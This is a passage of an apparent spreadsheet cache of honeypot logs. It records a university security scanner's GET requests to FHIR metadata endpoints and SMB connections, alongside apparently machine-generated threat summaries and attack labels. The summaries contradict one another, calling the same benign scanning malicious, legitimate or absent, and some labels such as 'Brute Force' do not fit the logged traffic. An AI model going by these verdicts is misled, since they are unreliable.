'/r3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '103.113.68.70', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '103.113.68.70', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '103.113.68.70', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '149.102.153.168', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '149.102.153.168', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '94.131.113.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '94.131.113.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '144.126.148.5', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '144.126.148.5', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '144.126.148.5', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '144.126.148.5', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.26.156.60', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.93.37.45', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.93.37.45', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.93.37.45', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.93.37.45', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '154.93.37.45', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fh"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c1ae:5913"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No data provided for analysis. &amp;&amp; No log data provided, unable to analyze. &amp;&amp; An unknown entity is accessing a system's metadata, likely for reconnaissance or exploitation purposes. The user agent appears to be a security scanner from a specific organization. This suggests a potential scan of the system's metadata. &amp;&amp; No attempt to connect or transfer data over HTTPS was observed, indicating normal behavior for this service. _x000a_The absence of an HTTP request is unusual as it typically indicates some form of communication with the service. _x000a_This lack of activity could also be due to a configuration issue or network limitations restricting access. &amp;&amp; A GET request is being made to retrieve metadata from a system, potentially indicating reconnaissance or information gathering activity by an unknown entity. The unusual user-agent string suggests the request may not be legitimate. This could be a precursor to more malicious activities. &amp;&amp; A malicious scanner is probing the system for sensitive information, likely to identify vulnerabilities or exploit weaknesses in the FHIR metadata service. The User-Agent indicates it's a security scanner from FH Muenster. This activity suggests reconnaissance or potential exploitation of system resources. &amp;&amp; A GET request is being sent to a server's metadata endpoint, likely for reconnaissance or data gathering purposes. The User-Agent indicates it may be a security scanner or automated tool. This could be an attempt to gather information about the server and its services. &amp;&amp; An unknown user is attempting to access metadata from a server with an unusual User-Agent string, possibly indicating a security scanner or bot. The request uses HTTPS encryption, but the User-Agent's origin and purpose are suspicious. This could be a reconnaissance activity to gather information about the system. &amp;&amp; Malicious activity detected - an unknown client is making a GET request to access system metadata, potentially attempting to gather sensitive information about the server. The client is using a custom user agent to hide its identity. This could be a reconnaissance attempt by an attacker. &amp;&amp; A GET request was made to retrieve metadata from a server, which could be an attempt to gather information about the server's configuration or functionality. The User-Agent header suggests this is likely a security scanner. This behavior may indicate reconnaissance activity by an unauthorized party. &amp;&amp; An unknown user accessed the system's metadata using a GET request with a specific user agent, potentially attempting to gather information about the system. This activity could be reconnaissance for further attacks or data extraction. The unusual user agent suggests the involvement of an automated tool. &amp;&amp; An unknown host is making a GET request to the metadata endpoint of a FHIR server, possibly for reconnaissance or data scraping. The User-Agent suggests it's being done by a security scanner or malware. This could be an attempt to gather information about the system and its services. &amp;&amp; A GET request was sent to a metadata endpoint for FHIR server API, which could be an attempt to gather information about the system's configuration or data storage. The User-Agent header indicates that it may have been triggered by a security scanner, possibly used for reconnaissance purposes. This activity suggests probing or scanning for potential vulnerabilities. &amp;&amp; A scanner is probing the server for information about its FHIR API, likely attempting to identify vulnerabilities or configuration weaknesses. The GET request indicates a reconnaissance activity rather than an actual attack. This may be a precursor to more malicious behavior. &amp;&amp; A GET request is made to a FHIR server with an unusual User-Agent, indicating potential reconnaissance or data scraping activity. The FHIR server is likely running on the system being scanned. This could be part of a larger attack to harvest sensitive health-related information. &amp;&amp; The data indicates a GET request made to the metadata endpoint of a server. The request is likely from a security scanner or vulnerability tester, and is probably reconnaissance activity as part of a larger scanning operation. &amp;&amp; An attacker is scanning for a specific resource, likely to exploit vulnerabilities or exfiltrate data. The target system appears to be serving a metadata endpoint related to health records. This could be part of a reconnaissance effort by an attacker. &amp;&amp; An attacker is attempting to access a specific server, possibly for reconnaissance or exploitation. The target appears to be an FHIR (Fast Healthcare Interoperability Resources) server, which could indicate the intention is to compromise healthcare data. The user-agent string suggests this is automated activity from a security scanner. &amp;&amp; An attacker is attempting to retrieve metadata for a FHIR (Fast Healthcare Interoperability Resources) server, which could be used to probe or exploit the system. The request appears to be a reconnaissance attempt to gather information about the system's configuration and capabilities. This activity may indicate a malicious actor searching for vulnerabilities. &amp;&amp; An unknown device has accessed a sensitive metadata endpoint on a server, indicating potential reconnaissance or data exfiltration attempts. The request appears to be from a security scanner, but its true intentions are unclear. This may be a probe for vulnerabilities in the system. &amp;&amp; A GET request is made to a FHIR metadata endpoint, which may indicate a reconnaissance or information gathering activity by an unauthorized entity. The presence of the &quot;FH Muenster/Security-Scanner&quot; user agent suggests potential scanning or probing. This could be indicative of malicious intent to exploit vulnerabilities. &amp;&amp; Possible malicious activity involves an HTTP request for sensitive FHIR metadata, likely made by a security scanner. The IP address 94.131.118.77 attempts to access potentially vulnerable API endpoints. This could be a reconnaissance scan for exploitable APIs. &amp;&amp; An unknown user accessed a server on IP address 194.146.12.172, requesting metadata for an FHIR server using a suspicious User-Agent string indicating it may be a security scanner. This could be an information gathering activity prior to potential exploitation. The request was made over HTTPS with expected content and connection settings. &amp;&amp; A GET request is being made to a server, targeting its metadata. The request originates from an unfamiliar IP address and is likely made by a security scanner for reconnaissance purposes. &amp;&amp; An unknown user is making a GET request to retrieve metadata about the server's FHIR API. The user-agent suggests this is likely a security scanner or vulnerability tester. This could be an attempt to gather information for future exploitation. &amp;&amp; No recent HTTPS connection attempts were made, indicating the service is being ignored by potential attackers. No malicious activity was detected via this service. The lack of connection attempts suggests no interest from hackers to exploit this particular vulnerability or functionality. &amp;&amp; No malicious activity detected, as the log data indicates no HTTPS connection was attempted. This suggests that potential attackers did not attempt to exploit this service. The lack of activity is likely due to the honeypot's presence being undetected. &amp;&amp; There is no clear indication of malicious activity from this log entry as it indicates a lack of HTTPS-related data, suggesting either no activity or insufficient data to determine its validity. This may imply that the system did not attempt to connect over HTTPS. It does not provide any evidence of suspicious behavior. &amp;&amp; An unknown user is attempting to access a server's metadata. The request appears to be coming from an IP address that may be a malicious scanner or attacker. A user-agent string suggests the activity might be related to security scanning or probing. &amp;&amp; A GET request was made to the metadata endpoint of a server, which could be a reconnaissance attempt to gather information about the system. This type of activity is often associated with malicious intentions, such as identifying potential vulnerabilities. The user-agent suggests a security scanner or vulnerability assessment tool was used. &amp;&amp; A GET request is made to retrieve metadata from a server, possibly indicating reconnaissance or information gathering by an attacker. The request contains a custom User-Agent string, which may be used to evade detection. This could be part of a larger attack chain. &amp;&amp; Possible malicious activity: An unknown user agent accessed a specific resource, attempting to retrieve metadata in a GET request. This could be related to reconnaissance or data gathering. The unusual user agent suggests potential exploitation of the system. &amp;&amp; A GET request is being made to the metadata endpoint of a healthcare system, which could be an attempt to gather information about the system's configuration and potentially exploit vulnerabilities. This behavior is unusual as metadata endpoints are typically not accessible from external networks. It may indicate probing or reconnaissance activity by malicious actors. &amp;&amp; An unauthorized scanner is probing the system for sensitive health information, likely as reconnaissance before a larger attack. The user-agent indicates it's a security scanner from FH Muenster in Germany. The request is for metadata related to healthcare data. &amp;&amp; A GET request is made to a FHIR metadata endpoint, possibly for reconnaissance or data harvesting purposes, potentially indicating an attempt to exploit the service. The request appears legitimate as it uses a common content type and accepts JSON response, but the User-Agent indicates a security scanner, raising suspicion. This activity may be indicative of initial probing before more malicious activity ensues. &amp;&amp; A GET request was made to the /fhir/metadata endpoint, suggesting an attempt to gather information about the server's metadata. The request originated from a suspicious user agent and IP address. This could be indicative of reconnaissance activity by a malicious entity. &amp;&amp; An unknown user on the internet is accessing metadata from a server that appears to be hosting medical data in a specific format. This access is likely unauthorized and may indicate an attempt to gather sensitive information. The request is made using a custom or unusual user agent, suggesting potential malicious intent. &amp;&amp; A GET request is made to a server on IP address 94.131.113.33, accessing metadata for healthcare-related services, which may be a reconnaissance attempt by an attacker. The request is made through a security scanner, indicating potential malicious intent. This could be part of a larger attack on healthcare systems. &amp;&amp; An unknown user accessed a sensitive server with potential FHIR metadata, possibly to map and understand the system's internal workings. This could be a reconnaissance attempt for future exploitation. The user appears to be using a security scanner to gather information. &amp;&amp; An unknown user is attempting to access a specific metadata resource on the monitored system, potentially gathering information for malicious purposes. The request appears to be coming from an IP address with no prior known association. The request headers indicate a potential health-related application, but the user agent suggests it may be a security scanner. &amp;&amp; Malicious entity accessed a server to retrieve metadata, likely for reconnaissance purposes, using a suspicious user agent and HTTPS protocol. This could be an initial scan before launching a more targeted attack. The request originated from IP address 154.90.63.129. &amp;&amp; A GET request is being made to a server, possibly attempting to gather information about the system's metadata. This could be reconnaissance for further exploitation. The user agent suggests it may be an automated scanning tool. &amp;&amp; A GET request is being sent to a metadata endpoint on a server with IP address 156.244.8.69, possibly indicating reconnaissance or information gathering activity. The request is from a user agent associated with a security scanner, suggesting it may be automated and malicious in nature. The FHIR protocol is used for health care data exchange, which could be the target of this inquiry. &amp;&amp; A GET request is made to a healthcare metadata endpoint, which may be a reconnaissance attempt by an attacker to gather information about the system. The User-Agent header suggests it's likely a vulnerability scanner. This activity could indicate preparation for potential exploitation. &amp;&amp; This log data indicates a potential reconnaissance attempt, where an unknown user is gathering information about the system's capabilities and resources. The request targets metadata related to FHIR (Fast Healthcare Interoperability Resources), which could be used for further exploitation or attacks. This activity suggests malicious intent to gather sensitive information. &amp;&amp; A GET request is being made to the server with a suspicious user agent indicating it's likely a security scanner. The request is for metadata related to FHIR (Fast Healthcare Interoperability Resources), which could be legitimate but warrants further investigation due to the unusual user agent. &amp;&amp; Possible malicious activity: An unknown user is accessing a service on the monitored system, using an unusual User-Agent string that suggests it may be a security scanner. The request is for metadata related to the FHIR healthcare standard, which could be indicative of reconnaissance or data collection. The host accessing the system is from an IP address outside typical geographic ranges. &amp;&amp; An unknown user is making a GET request to retrieve metadata from the system, which could be an attempt to gather information about the system's architecture or identify vulnerabilities. The user agent suggests it may be a security scanner. This activity may indicate reconnaissance. &amp;&amp; A GET request was made to a server hosting FHIR metadata, potentially for data harvesting or reconnaissance purposes. _x000a_The requesting user agent suggests it may be a security scanner, but its presence is still suspicious. _x000a_This could be an attempt to identify and target vulnerable systems. &amp;&amp; Malicious actor is attempting to access a potentially sensitive metadata endpoint with a GET request, possibly for reconnaissance or data gathering. This could be an attempt to identify vulnerabilities in the system. The User-Agent suggests it may be part of a security scanner or vulnerability assessment tool. &amp;&amp; This data indicates a GET request to the metadata of an FHIR server, possibly made by a security scanner or vulnerability testing tool. This could be part of reconnaissance or scanning activity. The request is likely legitimate but may also be used as a probing mechanism for potential vulnerabilities. &amp;&amp; An unknown user is making a GET request to a sensitive server endpoint, potentially retrieving metadata about the system's configuration. This could be a reconnaissance attempt by an attacker. The request appears to be coming from an unusual or fake user agent. &amp;&amp; This log indicates a lack of HTTP traffic, suggesting an unusual or potential malicious absence of expected communication for this service. It is likely a probe or reconnaissance attempt to identify the service's status and vulnerability. This could be an initial step in a more complex attack. &amp;&amp; A potential FHIR-based medical data exfiltration attempt has been detected, involving a GET request to retrieve metadata from the server. The user agent suggests it's likely a security scanner or vulnerability tester, but this could be used as a cover for malicious activity. &amp;&amp; A GET request is made to a specific endpoint, likely retrieving metadata, with an unusual User-Agent indicating potential scanning activity. The request includes an Accept header for application/fhir+json, which may be related to health information systems. This could be indicative of reconnaissance or data harvesting. &amp;&amp; No log data provided, so there is no activity to analyze. &amp;&amp; A GET request was made to a specific URL, indicating potential probing or reconnaissance activity._x000a_The request includes a unique user agent string suggesting it might be automated or malicious software._x000a_The specified URL is likely related to health information exchange, possibly targeting sensitive medical data. &amp;&amp; A scanner is attempting to retrieve metadata from the system, which could be a reconnaissance step before a more malicious attack. This activity is likely probing for vulnerabilities in the system's API. The user-agent indicates it is a security scanner. &amp;&amp; An unknown user is accessing a server, likely for reconnaissance or testing, with an unusual request for metadata about the system's structure. The request is made through a custom client that identifies itself as a security scanner from a specific organization. This behavior may indicate a scan or probing activity."/>
    <s v="I don't have any log data provided to analyze. If you provide the actual log data, I'll be happy to help identify the types of attacks based on the activity. &amp;&amp; I'd need some actual log data to analyze, but since you provided &quot;NA&quot;, I'll have to wait for more information. _x000a__x000a_Please provide the log data and I'll be happy to help with analyzing it! &amp;&amp; Unknown Target &amp;&amp; Port Scan &amp;&amp; FHIR Scanner &amp;&amp; Scan Attempt &amp;&amp; Port Scanner &amp;&amp; Web Scan &amp;&amp; Web Scanning &amp;&amp; Scanning GET &amp;&amp; Scanning Attack &amp;&amp; Scanning GET &amp;&amp; Port Scan &amp;&amp; Scan Attempt &amp;&amp; Brute Force &amp;&amp; Unknown Attack &amp;&amp; Scanning Attack &amp;&amp; FHIR Scanner &amp;&amp; Port Scan &amp;&amp; Port Scan _x000a_Unauthorized &amp;&amp; Port Scanning &amp;&amp; Scan Attempt &amp;&amp; Port Scan &amp;&amp; Scan Attempt &amp;&amp; FHIR Scanning &amp;&amp; Scanning FHIR &amp;&amp; Port Scanning &amp;&amp; Port Scanning &amp;&amp; FHIR Scanner &amp;&amp; Port Scan &amp;&amp; HTTP Scanning &amp;&amp; Port Scan _x000a_Scanning Port &amp;&amp; No Attack Found &amp;&amp; Port Scan"/>
  </r>
  <r>
    <x v="224"/>
    <x v="224"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T08:10:18"/>
    <d v="2024-07-08T14:42:00"/>
    <d v="2025-04-30T08:10:18"/>
    <n v="97"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H25"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;55904&amp;&amp;1433&amp;&amp;23&amp;&amp;161&amp;&amp;54375&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JO"/>
    <s v="Jordan"/>
    <s v="AM"/>
    <s v="Amman"/>
    <s v="NA"/>
    <s v="Amman"/>
    <s v="250441"/>
    <s v="NA"/>
    <s v="31.9544"/>
    <s v="35.9106"/>
    <s v="8376"/>
    <s v="Jordan Data Communications Company LLC"/>
    <s v="Jordan Data Communications Company LLC"/>
    <s v="residential"/>
    <s v="Jordan Telecom Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,54001)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,54107)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,54520)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,56623)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,65241)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,65372)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,52377)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,52416)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,60366)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,60432)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,65446)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,49985)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,52246)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,52714)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,61358)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,61442)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,54289)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,55501)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5ef9:4432"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="225"/>
    <x v="225"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T08:10:15"/>
    <d v="2024-03-05T10:10:00"/>
    <d v="2025-04-30T08:10:15"/>
    <n v="221"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
